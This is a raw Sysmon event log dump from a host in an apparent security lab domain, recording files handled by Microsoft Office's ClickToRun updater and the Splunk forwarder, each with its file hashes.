14:55:16.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TelemetryDashboard.xltxMD5=C0F0C1541E8C2498910C4D78326BE75B,SHA256=9A79850D172D21FD8E4299E24DA7BA03A3A1562690C813E2F11D5F80823BB761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\STSLISTI.DLLMD5=1C6178F20C2FE12CD88904A9AE0A46AB,SHA256=DBD2FB1365D939EA8C8F58BB348506E71182A0BC251987B8C8333997D73B2DC0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\STSLIST.CHMMD5=89920DC13154BE087439A2935B0C78FD,SHA256=16D7794BC0D43F8C8CAD61F6FD431B168026BD4B369E06ED8125C5D1A6B5FE88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SOCIALCONNECTORRES.DLLMD5=50D58512429888D37FA13075D8B0046D,SHA256=CDFFDDFE6E6DA5350C47D42B62C6EF5E3AE5D470B449B7D4DCAB797C14FA310F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SLINTL.DLLMD5=58E66BEE62FA133CD1EBF1148119D899,SHA256=193AE01BF95CADB1A9DB1E0D475C731A0E9142413CF04D136BD860D6FC264B2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SkypeForBusinessVDI2019_eula.txtMD5=666E67F18D742E83EFED121185F6EB4A,SHA256=6932C58B3549CFB10AD466D73572F4D6A533712E5A55F3647E25361CB55FFCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SkypeForBusinessBasic2019_eula.txtMD5=199E27792D4C0D45E08CC5D0D3C02AC9,SHA256=1C7EB2E23415A3DC724856298A2215B6E3BE4528826D10C437203F7C1E770098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINE_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINE_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINE_COL.HXTMD5=333F8D3F2BC846CD8B1E39052E20666F,SHA256=E8CF51A282D00316003845F75DEAF5FA6C8271A9C3AA498777CAB901ADF4DFC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINE_COL.HXCMD5=6D022391B1BB49DE7B9ACCFF4827942D,SHA256=D5DBD3B579476C5FDB94FC7614F9BF9DA736F714E502F0AA8587B43D5C0C1A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINEG_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINEG_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINEG_COL.HXTMD5=6C3F44824282154FE718B22832A3FC39,SHA256=72C7441ACAA541F9CA96A3A10728E22BA197023E5B26D515D826F0083DC2960D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINEG_COL.HXCMD5=DE1B110CBE87F306B58D81B5BD05FE10,SHA256=4C0E1476504A2F1797AFD3F8654E45E98915B9D96526FF9AEE012EB1175C6F0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINEG.HXSMD5=740BEDA555CFE02BF4F859BE2BCD86F8,SHA256=4F5913AB96925FB92F5D35FE9F0506D62F6575A1D9CDC48D6A91C96DDBA1DEE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_ONLINE.HXSMD5=212183009DAF7F18865DFB0787EB0EB8,SHA256=4948C1869FD6871DD660822797F38EA85019253DB982442978ABC85843D2847F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_COL.HXTMD5=D4936D1A9C6A6D82A4598C31255F4A11,SHA256=FC80A71BC2A60CDF8A0052FB707A9C466D0077CE15E91AA266F7A670A2E64BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_COL.HXCMD5=EA51B4FF2D92A850BA3C0CE450CEC62D,SHA256=0E99BBDCDFCCE8A8493A49775B2F93FF085F52EE224F653808A1972B7B064059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_BASIC_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_BASIC_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_BASIC_COL.HXTMD5=73995876C877C5452CB339D00ACBD907,SHA256=F42AF963979E3A0ED31EF6D8E6924952E7571F05C7FD945C53AF1ED8B3994017,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_BASIC_COL.HXCMD5=4C85944D450510FA7D8ECC22B10E3778,SHA256=7D9AEB3BD93B1F3191C4B42BD15FB9A15A93223FEA56EE352273318821561914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB_BASIC.HXSMD5=62EECA0417252E2F07167BAD2B8D88AE,SHA256=744B65CADF18EC14A051ECD254B28C5A7988ED77667BB99DE4941FF7D64A7EDC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SKYPEFB.HXSMD5=4CDAA6E1F60C4EF6873F1745A9A5AAFC,SHA256=2B7808BECC46F4A4682F801C13A0B67773192B8BBAB7947501DCBC30AAD79B4C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SETLANG_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SETLANG_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SETLANG_COL.HXTMD5=5BB9A0ECC3D3F9C41ADF46E3AE5989E2,SHA256=A47928A24648BA8A43213A596206BCC10FC6F95B366311CFADE288F4E6B5677C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SETLANG_COL.HXCMD5=2D5B32DE3AFAE50A363A61FD85C87D81,SHA256=70D387AD2D1E1273CCED0E3C9BFB7FDDFB851E30A7AC5EF16EA55C0316664E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SETLANG.HXSMD5=1A4B688E1C2E1CB7E5BF16D0FFDA4C6F,SHA256=5FED013FB3349104FAA14323E3DCD79AA1403105AA7219C094DD70C7656B7A9E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QRYINT32.DLLMD5=4F38FA1E8882AE536139D66AEC418841,SHA256=4457B2D11C98D9F1B48F060F8AC860E524A92280EA37AFAF8761D85632933C7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBWZINT.DLLMD5=7736A65B204EA2DA666702083EC2940A,SHA256=0233F8F60ED7AA8202DC2CC899BD059A007DAE6DCEDACFA0A39A1B3F8604F67D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBCOLOR.SCMMD5=E915ADCB77D3871AD7F63506F19050E7,SHA256=8A6BF9DCF5EB6E6F40833BC402FAE792F64B091ABC30B85439C4300F42D83C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUB6INTL.DLLMD5=95AAD320CAE68D2E65985CD9E03618C2,SHA256=476A4AF6E33CFAE92EB7F962450465009E92B227AFE05C71E76EE4BCD6C8D1D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PSRCHSRN.DATMD5=4EFB221BC250CE29D4279FD9F5CBDAA5,SHA256=DAB41152137DE61D4230B51D5C76415417159B6DA3CFAD763AFC3FFCF662A7A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.611{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F6F4C7D0F2856B2A4E80F901639D8D3,SHA256=2819EF0533B4219967CF9E1700DA635FF297416EA277B31E0F36A17C8B5953BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PSRCHPHN.DATMD5=4BABCD7A6F7AA33EAE6791DE2B79C075,SHA256=E0B2C47EDC3315F144D4FAB2DB64A1541A9361D1248FEDDA79FECA332505F2F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PSRCHLTS.DATMD5=265B2AE0098EA6FC19A1EB56D6F062F1,SHA256=A9FF4194B71675CEBAF615CDD1F1CADD1338DB0681AB796F24EC34A8B58AC857,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PSRCHLEX.DATMD5=6DC51B8EC54A465714765445DD0190AF,SHA256=47B84AD0B3F65DB4B646AE412535DF78DDCC85D169EF34DDFFBAC95B89A1110F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PSRCHKEY.DATMD5=637F36F8C7AC336C5448B5FAADE33158,SHA256=255AFAB2453FF0F9D5043DEC621CF8CEC17501E0F37E3F0DFC444AF94F6E4810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLV.XLSMD5=D06585F0C1DABE598CB56F2776263401,SHA256=398110335CB8E62BC91B4117B613C4C699E9D1CB3A257AB67E0A86C51DB961EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLV.PPTMD5=AD3AF821274DE583BCAD58524F5D3CCA,SHA256=4125A234E556900B5A2397341916748996B2226B23443CC70566363218D9ED7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLV.DOCMD5=DD20BBA2C4DB5CC6949844174B1BA279,SHA256=CEE85DD9B74E156C969FBF55A12A68A2B388F7DADBC446549A07211FA3697A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 